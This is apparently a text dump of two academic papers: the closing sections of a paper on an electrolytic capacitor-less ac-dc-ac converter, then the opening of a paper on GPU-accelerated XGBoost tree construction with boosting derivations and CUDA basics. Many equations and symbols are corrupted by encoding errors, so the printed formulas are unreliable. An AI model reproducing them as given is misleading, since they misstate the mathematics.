converter is same as the traditional. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 82 Figure 6 shows that the dynamic error of the dc link voltage of the novel converter driving an induction motor is smaller than the traditional. Figure 6(a) demonstrates that the dc link voltage of the novel converter maintains six-pulse voltage. However, figure 6(b) demonstrates that the dc link voltage of the traditional converter has a larger error than the novel converter. Figure 7 shows that A-phase stator currents of an induction motor fed by two different converters have the same performance. Data in table 1 show that the maximum voltage conversion efficiency of the novel converter is equal to the traditional. The harmonic and the output voltage at different frequency of the novel is similar to the traditonal. Data from table 2 except the harmonic of the output voltage at fifty frequency show that the novel converter has the similar performance with the traditional. Output voltage in figure 8 and the data in table 3 show that the mathematical model of the novel converter has the same performance with the novel converter. So the model is accurate. IV. CONCLUSION The electrolytic capacitor-less ac-dc-ac converter proposed in this paper has the following characteristic. (1) The novel topology is effective for driving an induction motor. (2) The dc link voltage is a six-pulse voltage. (3) the harmonic of the output voltage caused by the six- pulse voltage on dc link is similar to the traditional. (4) the voltage conversation efficiencies of the novel converter feeding two different loads are equal to the traditional. (5) Simulation results show that the mathematics model of the novel converter is accurate and easy to build. ACKNOWLEDGMENT This work was supported by China Nature Science Foundation(51577110) REFERENCES [1] Lu Xiwei Liu Zhigang Wang Lei. Estimate Approach for Fatigue Damage of Aluminum Electrolytic Capacitor Based on Accumulated Damage Theory[J]. Transactions of China Electro technical Society, 2011,(04):13-18. Doi:10.19595/j.cnki.1000-6753.tces.2011.04.003 [2] Niu, H., Wang, S., Ye, X., et al. “Lifetime prediction of aluminum electrolytic capacitors in LED drivers considering parameter shifts,” Oct.Vol.(88-90),2018, 453-457, DOI: 10.1016/j.microrel.2018.06.027 [3] Hadeed Ahmed Sher, Khaled E. Addoweesh, Yasin Khan. Effect of short circuited dc link capacitor of an ac–dc–ac inverter on the performance of induction motor[J].Journal of King Saud University – Engineering Sciences,2016,28: 199–206. [4] Hadeed A Shera, Khaled E Addoweesh, Zorays Khalid, etc. Theoretical and experimental analysis of inverter fed induction motor system under DC link capacitor failure[J]. Journal of King Saud University- Engineering Sciences,2015,06（001）:1-9. [5] DAI Bin, ZHAO Run-lin, SHANG Dong-juan. Research on Output Control of High-performance Single-phase Voltage-source Inverters[J]. Electrical Measurement & Instrumentation, 2011,48(01):42-45.doi: 1001-1390(2011)01 -0042 -04. [6] H. Luo, G.P. Wu, Q Yin, “Proportional-resonant control of a single- phase to three-phase converter without electrolytic capacitor,” Proc. 2015 Chinese Automation Congress(CAC 2015), Nov. 2015, pp. 1798-1803,DOI: 10.1109/CAC.2015.7382795 [7] Zhang Chenghui, Li Ke, Du Chunshui,etc. An Energy-Feedback Control System of Inverter Based on Phase and Amplitude Control[J]. Transactions of China Electrotechnical Society,2005,20(2):41-45. DOI：10.19595/j.cnki.1000-6753.tces.2005.02.007 [8] Hemalatha S, A. Maheswari. DIRECT AC-AC CONVERTER WITH HIGH FREQUENCY LINK TRANSFORMER USING SINUSOIDAL PWM TECHNIQUE[J]. South Asian Journal of Engineering and Technology Vol.2, No.20 (2016) 51–56. [9] Kim Joohn Sheok, Sul Seung Ki. New control scheme for AC-DC- AC converter without DC link electrolytic capacitor[J].IEEE Annual Power Electronics Specialists Conference, p 300-306, 1993 [10] C.C. Hou, H.P. Su, “multi-carrier PWM for AC-DC-AC converter without DC link electrolytic capacitor,” 2014 International Power Electronics Conference(IPEC-Hiroshima-ECCE Asia 2014), May 2014, pp. 2821-2825, DOI: 10.1109/IPEC.2014.6870081 [11] M.S. Irfan, J.H. Park, “Power-Decoupling of a Multiport Isolated Converter for an Electrolytic-Capacitorless Multilevel Inverter,” IEEE TRANSACTIONS ON POWER ELECTRONICS, 2018, 33, (8), pp. 6656-6671. DOI: 10.1109/TPEL.2017.2763168 [12] Montie A. Vitorino, Luciano F. S. Alves, F.M.P. Italo Roger, et al, “High-frequency pulsating DC-link three-phase inverter without electrolytic capacitor,” Conf. Proc. IEEE Appl. Power Electron. Conf. Expo.(APEC 2017), March 2017, pp. 3456-3461, DOI: 10.1109/APEC.2017.7931193 [13] LU Yuan, HU Binghui, ZHANG Junwei ，etc. A three-segment algorithm research based on SVPWM modulation[J]. Power System Protection and Control, 2016,（06）:68-75. [14] Zhou Juan Wei Chen Yang Yu,etc. Inverter Simplified Algorithm of PWM and Inhibit Common-Mode Voltage Strategy[J]. Transactions of China Electro technical Society, 2014,(08):158-165. http://apps.webofknowledge.com/OneClickSearch.do?product=WOS&search_mode=OneClickSearch&excludeEventConfig=ExcludeIfFromFullRecPage&colName=WOS&SID=6Cuyv5o34dHCBpTBVyd&field=AU&value=Niu,%20H http://apps.webofknowledge.com/OneClickSearch.do?product=WOS&search_mode=OneClickSearch&excludeEventConfig=ExcludeIfFromFullRecPage&colName=WOS&SID=6Cuyv5o34dHCBpTBVyd&field=AU&value=Wang,%20S https://www.engineeringvillage.com/search/submit.url?CID=quickSearchCitationFormat&implicit=true&usageOrigin=recordpage&category=authorsearch&searchtype=Quick&searchWord1=%7bLuo%2C+Hui%7d§ion1=AU&database=1&yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?CID=quickSearchCitationFormat&implicit=true&usageOrigin=recordpage&category=authorsearch&searchtype=Quick&searchWord1=%7bWu%2C+Genping%7d§ion1=AU&database=1&yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?CID=quickSearchCitationFormat&implicit=true&usageOrigin=recordpage&category=authorsearch&searchtype=Quick&searchWord1=%7bYin%2C+Quan%7d§ion1=AU&database=1&yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?CID=quickSearchCitationFormat&implicit=true&usageOrigin=recordpage&category=authorsearch&searchtype=Quick&searchWord1=%7bSu%2C+Hsin-Ping%7d§ion1=AU&database=1&yearselect=yearrange&sort=yr http://apps.webofknowledge.com/DaisyOneClickSearch.do?product=WOS&search_mode=DaisyOneClickSearch&colName=WOS&SID=5ELXBJfDQ3nWvr24LLQ&author_name=Irfan,%20MS&dais_id=7883078&excludeEventConfig=ExcludeIfFromFullRecPage http://apps.webofknowledge.com/DaisyOneClickSearch.do?product=WOS&search_mode=DaisyOneClickSearch&colName=WOS&SID=5ELXBJfDQ3nWvr24LLQ&author_name=Park,%20JH&dais_id=559586&excludeEventConfig=ExcludeIfFromFullRecPage https://www.engineeringvillage.com/search/submit.url?CID=quickSearchCitationFormat&implicit=true&usageOrigin=recordpage&category=authorsearch&searchtype=Quick&searchWord1=%7bVitorino%2C+Montie+A.%7d§ion1=AU&database=1&yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?CID=quickSearchCitationFormat&implicit=true&usageOrigin=recordpage&category=authorsearch&searchtype=Quick&searchWord1=%7bAlves%2C+Luciano+F.+S.%7d§ion1=AU&database=1&yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?CID=quickSearchCitationFormat&implicit=true&usageOrigin=recordpage&category=authorsearch&searchtype=Quick&searchWord1=%7bDa+Silva%2C+Italo+Roger+F.+M.+P.%7d§ion1=AU&database=1&yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?CID=quickSearchCitationFormat&implicit=true&usageOrigin=recordpage&category=authorsearch&searchtype=Quick&searchWord1=%7bDa+Silva%2C+Italo+Roger+F.+M.+P.%7d§ion1=AU&database=1&yearselect=yearrange&sort=yr work_les4de22qzd4pkbxjnruyovkn4 ---- Accelerating the XGBoost algorithm using GPU computing Accelerating the XGBoost algorithm using GPU computing Rory Mitchell and Eibe Frank Department of Computer Science, University of Waikato, Hamilton, New Zealand ABSTRACT We present a CUDA-based implementation of a decision tree construction algorithm within the gradient boosting library XGBoost. The tree construction algorithm is executed entirely on the graphics processing unit (GPU) and shows high performance with a variety of datasets and settings, including sparse input matrices. Individual boosting iterations are parallelised, combining two approaches. An interleaved approach is used for shallow trees, switching to a more conventional radix sort-based approach for larger depths. We show speedups of between 3� and 6� using a Titan X compared to a 4 core i7 CPU, and 1.2� using a Titan X compared to 2� Xeon CPUs (24 cores). We show that it is possible to process the Higgs dataset (10 million instances, 28 features) entirely within GPU memory. The algorithm is made available as a plug-in within the XGBoost library and fully supports all XGBoost features including classification, regression and ranking tasks. Subjects Artificial Intelligence, Data Mining and Machine Learning, Data Science Keywords Supervised machine learning, Gradient boosting, GPU computing INTRODUCTION Gradient boosting is an important tool in the field of supervised learning, providing state-of-the-art performance on classification, regression and ranking tasks. XGBoost is an implementation of a generalised gradient boosting algorithm that has become a tool of choice in machine learning competitions. This is due to its excellent predictive performance, highly optimised multicore and distributed machine implementation and the ability to handle sparse data. Despite good performance relative to existing gradient boosting implementations, XGBoost can be very time consuming to run. Common tasks can take hours or even days to complete. Building highly accurate models using gradient boosting also requires extensive parameter tuning. In this process, the algorithm must be run many times to explore the effect of parameters such as the learning rate and L1/L2 regularisation terms on cross validation accuracy. This paper describes and evaluates a graphics processing unit (GPU) algorithm for accelerating decision tree construction within individual boosting iterations in the single machine XGBoost setting. GPUs have been used to accelerate compute intensive tasks in machine learning and many other fields through the utilisation of their specialised SIMD architecture (Coates et al., 2013; Merrill & Grimshaw, 2011). GPU-accelerated decision tree algorithms have been tried before with moderate success. Our unique contributions are as follows. We describe a completely GPU-based implementation that scales to arbitrary numbers of leaf nodes and exhibits stable performance characteristics How to cite this article Mitchell and Frank (2017), Accelerating the XGBoost algorithm using GPU computing. PeerJ Comput. Sci. 3:e127; DOI 10.7717/peerj-cs.127 Submitted 4 April 2017 Accepted 27 June 2017 Published 24 July 2017 Corresponding authors Rory Mitchell, ramitchellnz@gmail.com Eibe Frank, eibe@cs.waikato.ac.nz Academic editor Charles Elkan Additional Information and Declarations can be found on page 36 DOI 10.7717/peerj-cs.127 Copyright 2017 Mitchell and Frank Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.127 mailto:ramitchellnz@�gmail.�com mailto:eibe@�cs.�waikato.�ac.�nz https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.127 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ on a range of datasets and settings. We experiment with novel approaches to processing interleaved subsets of data on GPUs and develop a massively parallel tree construction algorithm that natively handles sparse data. We also provide a feature complete implementation for classification, regression and learning to rank tasks in the open source XGBoost library (https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu). BACKGROUND AND RELATED WORK We review the basic strategy of tree boosting for machine learning and revisit the derivation of the XGBoost algorithm, before considering the execution model and memory architecture of GPUs as well as languages and libraries for GPU computing. Our GPU-based implementation makes extensive use of high-performance GPU primitives and we discuss these next. We briefly discuss the effect of using single-precision floating point arithmetic before reviewing related work on GPU-based induction of decision trees from data. Tree boosting algorithms XGBoost is a supervised learning algorithm that implements a process called boosting to yield accurate models. Supervised learning refers to the task of inferring a predictive model from a set of labelled training examples. This predictive model can then be applied to new unseen examples. The inputs to the algorithm are pairs of training examples ð~x0; y0Þ; ð~x1; y1Þ � � � ð~xn; ynÞ where ~x is a vector of features describing the example and y is its label. Supervised learning can be thought of as learning a function Fð~xÞ ¼ y that will correctly label new input instances. Supervised learning may be used to solve classification or regression problems. In classification problems the label y takes a discrete (categorical) value. For example, we may wish to predict if a manufacturing defect occurs or does not occur based on attributes recorded from the manufacturing process, such as temperature or time, that are represented in ~x. In regression problems the target label y takes a continuous value. This can be used to frame a problem such as predicting temperature or humidity on a given day. XGBoost is at its core a decision tree boosting algorithm. Boosting refers to the ensemble learning technique of building many models sequentially, with each new model attempting to correct for the deficiencies in the previous model. In tree boosting each new model that is added to the ensemble is a decision tree. We explain how to construct a decision tree model and how this can be extended to generalised gradient boosting with the XGBoost algorithm. Decision trees Decision tree learning is a method of predictive modelling that learns a model by repeatedly splitting subsets of the training examples (also called instances) according to some criteria. Decision tree inducers are supervised learners that accept labelled training examples as an input and generate a model that may be used to predict the labels of new examples. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 2/37 https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ In order to construct a decision tree, we start with the full set of training instances and evaluate all possible ways of creating a binary split among those instances based on the input features in ~x. We choose the split that produces the most meaningful separation of the target label y. Different measures can be used to evaluate the quality of a split. After finding the ‘best’ split, we can create a node in the tree that partitions training instances down the left or right branch according to some feature value. The subsets of training instances can then be recursively split to continue growing the tree to some maximum depth or until the quality of the splits is below some threshold. The leaves of the tree will contain predictions for the target label y. For categorical labels, the prediction can be set as the majority class from the training instances that end up in that leaf. For regression tasks, the label prediction can be set as the mean of the training instances in that leaf. To use the tree for prediction, we can input an unlabelled example at the root of the tree and follow the decision rules until the example reaches a leaf. The unlabelled example can be labelled according to the prediction of that leaf. Figure 1 shows an example decision tree that can predict whether or not an individual owns a house. The decision is based on their age and whether or not they have a job. The tree correctly classifies all instances from Table 1. Decision tree algorithms typically expand nodes from the root in a greedy manner in order to maximise some criterion measuring the value of the split. For example, decision tree algorithms from the C4.5 family (Quinlan, 2014), designed for classification, Figure 1 Example decision tree. Table 1 Example training instances. Instance Age Has job Owns house 0 12 N N 1 32 Y Y 2 25 Y Y 3 48 N N 4 67 N Y 5 18 Y N Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 3/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ use information gain as the split criterion. Information gain describes a change in entropy H from some previous state to a new state. Entropy is defined as HðTÞ ¼ � X y2Y PðyÞlogbPðyÞ where T is a set of labelled training instances, y ∈ Y is an instance label and P(y) is the probability of drawing an instance with label y from T. Information gain is defined as IGðT; Tleft; TrightÞ ¼ HT � ðnleft=ntotalÞ � HðTleftÞ � ðnright=ntotalÞ � HðTrightÞ Here Tleft and Tright are the subsets of T created by a decision rule. ntotal, nleft and nright refer to the number of examples in the respective sets. Many different criteria exist for evaluating the quality of a split. Any function can be used that produces some meaningful separation of the training instances with respect to the label being predicted. In order to find the split that maximises our criterion, we can enumerate all possible splits on the input instances for each feature. In the case of numerical features and assuming the data has been sorted, this enumeration can be performed in O(nm) steps, where n is the number of instances and m is the number of features. A scan is performed from left to right on the sorted instances, maintaining a running sum of labels as the input to the gain calculation. We do not consider the case of categorical features in this paper because XGBoost encodes all categorical features using one-hot encoding and transforms them into numerical features. Another consideration when building decision trees is how to perform regularisation to prevent overfitting. Overfitting on training data leads to poor model generalisation and poor performance on test data. Given a sufficiently large decision tree it is possible to generate unique decision rules for every instance in the training set such that each training instance is correctly labelled. This results in 100% accuracy on the training set but may perform poorly on new data. For this reason it is necessary to limit the growth of the tree during construction or apply pruning after construction. Gradient boosting Decision trees produce interpretable models that are useful for a variety of problems, but their accuracy can be considerably improved when many trees are combined into an ensemble model. For example, given an input instance to be classified, we can test it against many trees built on different subsets of the training set and return the mode of all predictions. This has the effect of reducing classifier error because it reduces variance in the estimate of the classifier. Figure 2 shows an ensemble of two decision trees. We can predict the output label using all trees by taking the most common class prediction or some weighted average of all predictions. Ensemble learning methods can also be used to reduce the bias component in the classification error of the base learner. Boosting is an ensemble method that creates Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 4/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ ensemble members sequentially. The newest member is created to compensate for the instances incorrectly labelled by the previous learners. Gradient boosting is a variation on boosting which represents the learning problem as gradient descent on some arbitrary differentiable loss function that measures the performance of the model on the training set. More specifically, the boosting algorithm executes M boosting iterations to learn a function F(x) that outputs predictions ŷ ¼ FðxÞ minimising some loss function Lðy; ŷÞ. At each iteration we add a new estimator f(x) to try to correct the prediction of y for each training instance: Fmþ1ðxÞ ¼ FmðxÞ þ f ðxÞ ¼ y We can correct the model by setting f(x) to: f ðxÞ ¼ y � FmðxÞ This fits the model f(x) for the current boosting iteration to the residuals y - Fm(x) of the previous iteration. In practice, we approximate f(x), for example by using a depth-limited decision tree. This iterative process can be shown to be a gradient descent algorithm when the loss function is the squared error: Lðy; FðxÞÞ ¼ 1 2 ðy � FðxÞÞ2 To see this, consider that the loss over all training instances can be written as J ¼ X i Lðyi; FðxiÞÞ We seek to minimise J by adjusting F(xi). The gradient for a particular instance xi is given by dJ dFðxiÞ ¼ d P i Lðyi; FðxiÞÞ dFðxiÞ ¼ dLðyi; FðxiÞÞ dFðxiÞ ¼ FmðxiÞ � yi Figure 2 Decision tree ensemble. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 5/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ We can see that the residuals are the negative gradient of the squared error loss function: f ðxÞ ¼ y � FmðxÞ ¼ � dLðy; FðxÞÞ dFðxÞ By adding a model that approximates this negative gradient to the ensemble we move closer to a local minimum of the loss function, thus implementing gradient descent. Generalised gradient boosting and XGBoost Herein, we derive the XGBoost algorithm following the explanation in Chen & Guestrin (2016). XGBoost is a generalised gradient boosting implementation that includes a regularisation term, used to combat overfitting, as well as support for arbitrary differentiable loss functions. Instead of optimising plain squared error loss, an objective function with two parts is defined, a loss function over the training set as well as a regularisation term which penalises the complexity of the model: Obj ¼ X i Lðyi; ŷiÞ þ X k �ðfkÞ Lðyi; ŷiÞ can be any convex differentiable loss function that measures the difference between the prediction and true label for a given training instance. Ω(fk) describes the complexity of tree fk and is defined in the XGBoost algorithm (Chen & Guestrin, 2016) as �ðfkÞ ¼ �T þ 1 2 �w2 (1) where T is the number of leaves of tree fk and w is the leaf weights (i.e. the predicted values stored at the leaf nodes). When Ω(fk) is included in the objective function we are forced to optimise for a less complex tree that simultaneously minimises Lðyi; ŷiÞ. This helps to reduce overfitting. �T provides a constant penalty for each additional tree leaf and �w2 penalises extreme weights. � and � are user configurable parameters. Given that boosting proceeds in an iterative manner we can state the objective function for the current iteration m in terms of the prediction of the previous iteration ŷi ðm�1Þ adjusted by the newest tree fk: Objm ¼ X i Lðyi; ŷiðm�1Þ þ fkðxiÞÞ þ X k �ðfkÞ We can then optimise to find the fk which minimises our objective. Taking the Taylor expansion of the above function to the second order allows us to easily accommodate different loss functions: Objm ’ X i ½Lðyi; ŷiðm�1ÞÞ þ gifkðxÞ þ 1 2 hifkðxÞ2� þ X k �ðfkÞ þ constant Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 6/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Here, gi and hi are the first and second order derivatives respectively of the loss function for instance i: gi ¼ dLðyi; ŷiðm�1ÞÞ dŷi ðm�1Þ hi ¼ d2Lðyi; ŷiðm�1ÞÞ dðŷiðm�1ÞÞ 2 Note that the model ŷi ðm�1Þ is left unchanged during this optimisation process. The simplified objective function with constants removed is Objm ¼ X i ½gifkðxÞ þ 1 2 hifkðxÞ2� þ X k �ðfkÞ We can also make the observation that a decision tree predicts constant values within a leaf. fk(x) can then be represented as wq(x) where w is the vector containing scores for each leaf and q(x) maps instance x to a leaf. The objective function can then be modified to sum over the tree leaves and the regularisation term from Eq. (1): Objm ¼ XT j¼1 X i2Ij gi 0 @ 1 AwqðxÞ þ 1 2 X i2Ij hi 0 @ 1 Aw2qðxÞ 2 4 3 5 þ �T þ 1 2 � XT j¼1 w2 Here, Ij refers to the set of training instances in leaf j. The sums of the derivatives in each leaf can be defined as follows: Gj ¼ X i2Ij gi Hj ¼ X i2Ij hi Also note that wq(x) is a constant within each leaf and can be represented as wj. Simplifying we get Objm ¼ XT j¼1 Gjwj þ 1 2 ðHj þ �Þw2j � � þ �T (2) The weight wj for each leaf minimises the objective function at @Objm @wj ¼ Gj þ ðHj þ �Þwj ¼ 0 The best leaf weight wj given the current tree structure is then wj ¼ � Gj Hj þ � Using the best wj in Eq. (2), the objective function for finding the best tree structure then becomes Objm ¼ � 1 2 XT j¼1 G2j Hj þ � þ �T (3) Eq. (3) is used in XGBoost as a measure of the quality of a given tree. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 7/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Growing a tree Given that it is intractable to enumerate through all possible tree structures, we greedily expand the tree from the root node. In order to evaluate the usefulness of a given split, we can look at the contribution of a single leaf node j to the objective function from Eq. (3): Objleaf ¼ � 1 2 G2j Hj þ � þ � We can then consider the contribution to the objective function from splitting this leaf into two leaves: Objsplit ¼ � 1 2 G2jL HjL þ � þ G2jR HjR þ � ! þ 2� The improvement to the objective function from creating the split is then defined as Gain ¼ Objleaf � Objsplit which yields Gain ¼ 1 2 G2L HL þ � þ G 2 R HR þ � � ðGL þ GRÞ 2 HL þ HR þ � " # � � (4) The quality of any given split separating a set of training instances is evaluated using the gain function in Eq. (4). The gain function represents the reduction in the objective function from Eq. (3) obtained by taking a single leaf node j and partitioning it into two leaf nodes. This can be thought of as the increase in quality of the tree obtained by creating the left and right branch as compared to simply retaining the original node. This formula is applied at every possible split point and we expand the split with maximum gain. We can continue to grow the tree while this gain value is positive. The � regularisation cost at each leaf will prevent the tree arbitrarily expanding. The split point selection is performed in O(nm) time (given n training instances and m features) by scanning left to right through all feature values in a leaf in sorted order. A running sum of GL and HL is kept as we move from left to right, as shown in Table 3. GR and HR are inferred from this running sum and the node total. Table 2 shows an example set of instances in a leaf. We can assume we know the sums G and H within this node as these are simply the GL or GR from the parent split. Therefore, we have everything we need to evaluate Gain for every possible split within these instances and select the best. XGBoost: data format Tabular data input to a machine learning library such as XGBoost or Weka (Hall et al., 2009) can be typically described as a matrix with each row representing an instance and each column representing a feature as shown in Table 3. If f2 is the feature to be predicted then an input training pair ð~xi; yiÞ takes the form ((f0i, f1i), f2i) where i is Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 8/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ the instance id. A data matrix within XGBoost may also contain missing values. One of the key features of XGBoost is the ability to store data in a sparse format by implicitly keeping track of missing values instead of physically storing them. While XGBoost does not directly support categorical variables, the ability to efficiently store and process sparse input matrices allows us to process categorical variables through one-hot encoding. Table 4 shows an example where a categorical feature with three values is instead encoded as three binary features. The zeros in a one-hot encoded data matrix can be stored as missing values. XGBoost users may specify values to be considered as missing in the input matrix or directly input sparse formats such as libsvm files to the algorithm. XGBoost: handling missing values Representing input data using sparsity in this way has implications on how splits are calculated. XGBoost’s default method of handling missing data when learning decision tree splits is to find the best ‘missing direction’ in addition to the normal threshold decision rule for numerical values. So a decision rule in a tree now contains a numeric decision rule such as f0 � 5.53, but also a missing direction such as missing = right that sends all missing values down the right branch. For a one-hot encoded categorical variable where the zeros are encoded as missing values, this is equivalent to testing ‘one vs all’ splits for each category of the categorical variable. Table 2 Enumerating splits. Feature value 0.1 0.4 0.5 0.6 0.9 1.1 gi 0.1 0.8 0.2 -1.1 -0.2 -0.5 hi 1.0 1.0 1.0 1.0 1.0 1.0 GL 0.0 0.1 0.9 1.1 0.0 -0.2 HL 0.0 1.0 2.0 3.0 4.0 5.0 Table 3 Example data matrix. Instance id f0 f1 f2 0 0.32 399 10.1 1 0.27 521 11.3 2 0.56 896 13.0 3 0.11 322 9.7 Table 4 Sparse data matrix. Instance id f0 f1 f2 0 1 0 0 1 1 0 0 2 0 0 1 3 0 1 0 Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 9/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ The missing direction is selected as the direction which maximises the gain from Eq. (4). When enumerating through all possible split values, we can also test the effect on our gain function of sending all missing examples down the left or right branch and select the best option. This makes split selection slightly more complex as we do not know the gradient statistics of the missing values for any given feature we are working on, although we do know the sum of all the gradient statistics for the current node. The XGBoost algorithm handles this by performing two scans over the input data, the second being in the reverse direction. In the first left to right scan the gradient statistics for the left direction are the scan values maintained by the scan, the gradient statistics for the right direction are the sum gradient statistics for this node minus the scan values. Hence, the right direction implicitly includes all of the missing values. When scanning from right to left, the reverse is true and the left direction includes all of the missing values. The algorithm then selects the best split from either the forwards or backwards scan. Graphics processing units The purpose of this paper is to describe how to efficiently implement decision tree learning for XGBoost on a GPU. GPUs can be thought of at a high level as having a shared memory architecture with multiple SIMD (single instruction multiple data) processors. These SIMD processors operate in lockstep typically in batches of 32 ‘threads’ (Matloff, 2011). GPUs are optimised for high throughput and work to hide latency through the use of massive parallelism. This is in contrast to CPUs which use multiple caches, branch prediction and speculative execution in order to optimise latency with regards to data dependencies (Baxter, 2013). GPUs have been used to accelerate a variety of tasks traditionally run on CPUs, providing significant speedups for parallelisable problems with a high arithmetic intensity. Of particular relevance to machine learning is the use of GPUs to train extremely large neural networks. It was shown in 2013 that one billion parameter networks could be trained in a few days on three GPU machines (Coates et al., 2013). Languages and libraries The two main languages for general purpose GPU programming are CUDA and OpenCL. CUDA was chosen for the implementation discussed in this paper due to the availability of optimised and production ready libraries. The GPU tree construction algorithm would not be possible without a strong parallel primitives library. We make extensive use of scan, reduce and radix sort primitives from the CUB (Merrill & NVIDIA-Labs, 2016) and Thrust (Hoberock & Bell, 2017) libraries. These parallel primitives are described in detail in ‘Parallel primitives.’ The closest equivalent to these libraries in OpenCL is the boost compute library. Several problems were encountered when attempting to use Boost Compute and the performance of its sorting primitives lagged considerably behind those of CUB/Thrust. At the time of writing this paper OpenCL was not a practical option for this type of algorithm. Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 10/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ Execution model CUDA code is written as a kernel to be executed by many thousands of threads. All threads execute the same kernel function but their behaviour may be distinguished through a unique thread ID. Listing 1 shows an example of kernel adding values from two arrays into an output array. Indexing is determined by the global thread ID and any unused threads are masked off with a branch statement. Listing 1 Example CUDA kernel __global__ void example(float �d_a, float �d_b, float �d_output, int n){ //Calculate global thread index //blockIdx.x - the current thread block number //blockDim.x - the thread block size //threadIdx.x - the thread index within the current block int global_tid = blockIdx.x � blockDim.x + threadIdx.x; if(global_tid < n){ d_output[global_tid] = d_a[global_tid] + d_b[global_tid]; } } Threads are grouped according to thread blocks that typically each contain some multiple of 32 threads. A group of 32 threads is known as a warp. Thread blocks are queued for execution on hardware streaming multiprocessors. Streaming multiprocessors switch between different warps within a block during program execution in order to hide latency. Global memory latency may be hundreds of cycles and hence it is important to launch sufficiently many warps within a thread block to facilitate latency hiding. A thread block provides no guarantees about the order of thread execution unless explicit memory synchronisation barriers are used. Synchronisation across thread blocks is not generally possible within a single kernel launch. Device-wide synchronisation is achieved by multiple kernel launches. For example, if a global synchronisation barrier is required within a kernel, the kernel must be separated into two distinct kernels where synchronisation occurs between the kernel launches. Memory architecture CUDA exposes three primary tiers of memory for reading and writing. Device-wide global memory, thread block accessible shared memory and thread local registers. � Global memory: Global memory is accessible by all threads and has the highest latency. Input data, output data and large amounts of working memory are typically stored in global memory. Global memory can be copied from the device (i.e. the GPU) to the host computer and vice versa. Bandwidth of host/device transfers is much slower Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 11/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ than that of device/device transfers and should be avoided if possible. Global memory is accessed in 128 byte cache lines on current GPUs. Memory accesses should be coalesced in order to achieve maximum bandwidth. Coalescing refers to the grouping of aligned memory load/store operations into a single transaction. For example, a fully coalesced memory read occurs when a warp of 32 threads loads 32 contiguous 4 byte words (128 bytes). Fully uncoalesced reads (typical of gather operations) can limit device bandwidth to less than 10% of peak bandwidth (Harris, 2013). � Shared memory: 48 KB of shared memory is available to each thread block. Shared memory is accessible by all threads in the block and has a significantly lower latency than global memory. It is typically used as working storage within a thread block and sometimes described as a ‘programmer-managed cache.’ � Registers: A finite number of local registers is available to each thread. Operations on registers are generally the fastest. Threads within the same warp may read/write registers from other threads in the warp through intrinsic instructions such as shuffle or broadcast (Nvidia, 2017). Parallel primitives Graphicsprocessingunitprimitivesaresmall algorithms usedasbuildingblocksinmassively parallel algorithms. While many data parallel tasks can be expressed with simple programs without them, GPU primitives may be used to compose more complicated algorithms while retaining high performance, readability and reliability. Understanding which specific tasks can be achieved using parallel primitives and the relative performance of GPU primitives as compared to their CPU counterparts is key to designing effective GPU algorithms. Reduction A parallel reduction reduces an array of values into a single value using a binary-associative operator. Given a binary-associative operator and an array of elements the reduction returns ða0 a1 � � � an�1Þ. Note that floating point addition is not strictly associative. This means a sequential reduction operation will likely result in a different answer to a parallel reduction (the same applies to the scan operation described below). This is discussed in greater detail in ‘Floating point precision.’ The reduction operation is easy to implement in parallel by passing partial reductions up a tree, taking O(logn) iterations given n input items and n processors. This is illustrated in Fig. 3. In practice, GPU implementations of reductions do not launch one thread per input item but instead perform parallel reductions over ‘tiles’ of input items then sum the tiles together sequentially. The size of a tile varies according to the optimal granularity for a given hardware architecture. Reductions are also typically tiered into three layers: warp, block and kernel. Individual warps can very efficiently perform partial reductions over 32 items using shuffle instructions introduced from Nvidia’s Kepler GPU architecture onwards. As smaller reductions can be combined into larger reductions by simply applying the binary associative operator on the outputs, these smaller warp reductions can be combined together to get the reduction for the entire tile. The thread block can Mitchell and Frank (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.127 12/37 http://dx.doi.org/10.7717/peerj-cs.127 https://peerj.com/computer-science/ iterate over many input tiles sequentially, summing the reduction from each. When all thread blocks are finished the results from each are summed together at the kernel level to produce the final output. Listing 2 shows code for a fast warp reduction using shuffle intrinsics to communicate between threads in the same warp. The ‘shuffle down’ instruction referred to in Listing 2 simply allows the current thread to read a register value from the thread d places to the left, so long as that thread is in the same warp. The complete warp reduction algorithm requires five iterations to sum over 32 items. 